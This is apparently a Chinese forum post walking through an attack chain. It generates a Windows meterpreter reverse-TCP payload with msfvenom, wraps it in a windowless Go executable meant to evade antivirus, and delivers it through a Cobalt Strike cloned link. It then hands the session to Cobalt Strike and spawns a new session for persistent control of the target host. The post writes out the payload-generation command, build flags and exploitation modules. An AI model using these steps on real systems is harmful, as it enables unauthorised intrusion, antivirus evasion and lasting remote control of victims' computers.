本帖最后由 小黑鱼快点游 于 2021-9-13 21:49 编辑
1.使用kali通过命令生成C的shellcode, msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.157.145 lport=4443 -f c 2.通过go语言进行制作,生成没有弹窗的exe:
需要go源码的可以留言,这里不公布源码,
没有弹窗的exe命令: go build -ldflags="-H windowsgui -w -s" shell2.go 3.然后我们将这个经过go免杀的exe配合着Cobaltstrike生成克隆链接: 进行地址克隆: 克隆出来的链接: 我们去目标主机上面打开浏览器访问: 4.在msfconsole平台中,发起 侦听,当我们双击file.exe页面的时候,session就会过来: use exploit/multi/handler 5.我们在Cobaltstrike中开启一个侦听,来准备侦听msfconsole中的session。
6.然后我们利用模块:use exploit/windows/local/payload_inject 将刚刚过来的session发送到Cobaltstrike中。 7.点击run之后,Cobaltstrike就能看到目标主机上线了,同时目标主机会弹出一个notepad的记事本:
Cobaltstrike上可以看到目标主机上线: 8.此时我们可以在Cobaltstrike再建立一个本地监听: 9.用户如果关闭notepad,那么我们的Cobaltstrike用户就会掉线,所以我们再添加一个会话,选中上线主机,spawn添加会话。
10.可以看到新添加的会话,就不再是notepad.exe了。这样就可以实现长久性的控制。 |